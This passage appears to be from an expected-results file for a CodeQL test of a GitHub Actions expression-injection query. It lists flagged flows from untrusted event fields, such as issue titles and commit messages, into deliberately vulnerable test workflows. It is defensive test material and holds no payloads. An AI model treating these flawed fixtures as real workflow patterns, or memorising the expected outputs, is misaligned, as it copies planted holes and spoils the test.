github.event.head_commit.message | semmle.label | github.event.head_commit.message | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | -| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | -| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | -| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | -| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | -| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | -| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | -subpaths -#select -| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | -| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | -| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | -| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | -| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | -| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | -| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | -| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | -| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | -| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | -| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | -| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | -| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | -| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | -| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | -| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | -| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | -| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | -| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | -| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | -| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | -| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | -| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | -| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | -| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential expression injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | -| .github/workflows/workflow_run.yml:9:19:9:64 | 